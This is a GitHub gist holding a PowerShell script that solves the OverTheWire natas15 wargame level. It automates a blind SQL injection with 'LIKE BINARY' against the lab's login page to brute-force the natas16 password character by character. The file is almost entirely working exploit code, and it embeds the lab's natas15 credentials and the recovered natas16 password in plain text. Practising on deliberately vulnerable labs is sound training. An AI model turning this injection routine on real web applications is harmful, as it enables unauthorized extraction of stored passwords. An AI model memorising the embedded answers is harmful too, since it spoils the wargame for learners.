Last active
June 14, 2018 06:56
-
-
Save taco-shellcode/8713397b6f20ecfd4b6f345c59b4ca4a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh | |
#http://natas15.natas.labs.overthewire.org/index.php?&debug&username=natas16" AND password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh% | |
Function BruteForce-Password() { | |
$credentials = Get-AuthorizedCredentials | |
$bruteForceArray = Create-CharacterArray | |
$password = '' | |
$continueCracking = $true | |
while($continueCracking) { | |
for($i=0; $i -le $bruteforceArray.length) { | |
$testCharacter = $bruteforceArray[$i] | |
# SQL injection query used to test if the user natas16 exist and test if current character of the password matches the test character | |
$sqlQuery = "natas16`" AND password LIKE BINARY `"$password$testCharacter%" | |
$results = Test-Password $credentials $sqlQuery | |
if ($results -eq $true) { | |
$password += $testCharacter | |
Write-Host "PASSED - Adding '$testCharacter' to password." | |
Write-Host "PASSWORD: $password" | |
$i = 0 | |
} else { | |
Write-Host "FAILED - '$testCharacter' does not match the current position. Testing next character" | |
$i++ | |
} | |
if ($i -ge $bruteforceArray.length) { | |
Write-Host "All possible characters have been exhausted. End of password has been reached." | |
return $password | |
} | |
} | |
} | |
} | |
# Credentials used to authenticate to the http://natas15.natas.labs.overthewire.org | |
Function Get-AuthorizedCredentials() { | |
$authorized_user = 'natas15' | |
$authorized_password = ConvertTo-SecureString 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J' -AsPlainText -Force | |
$authorized_credentials = New-Object System.Management.Automation.PSCredential($authorized_user, $authorized_password) | |
return $authorized_credentials | |
} | |
Function Create-CharacterArray() { | |
# Creates an array with all 62 alphanumeric UPPER and lower case characters: (a-z A-Z 0-9) | |
$characterArray = [char[]]([int][char]'A'..[int][char]'Z') + [char[]]([int][char]'a'..[int][char]'z') + 0..9 | |
return $characterArray | |
} | |
Function Test-Password($credentials, $sqlQuery) { | |
# Captures the response of the web request using the POST HTTP method | |
$httpResponse = Invoke-WebRequest -Method 'POST' -Uri "http://natas15.natas.labs.overthewire.org/index.php?&debug&username=$sqlQuery" -Credential $credentials | |
# Checks to see if the string 'exists' is present in the HTTP response | |
if ($httpResponse.Content.Contains('exists')) { | |
return $true | |
} else { | |
return $false | |
} | |
} | |
$start = Get-Date | |
$crackedPassword = BruteForce-Password | |
$end = Get-Date | |
$totalTime = $end - $start | |
Write-Host "The cracked password is: $($crackedPassword)" | |
Write-Host $totalTime |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment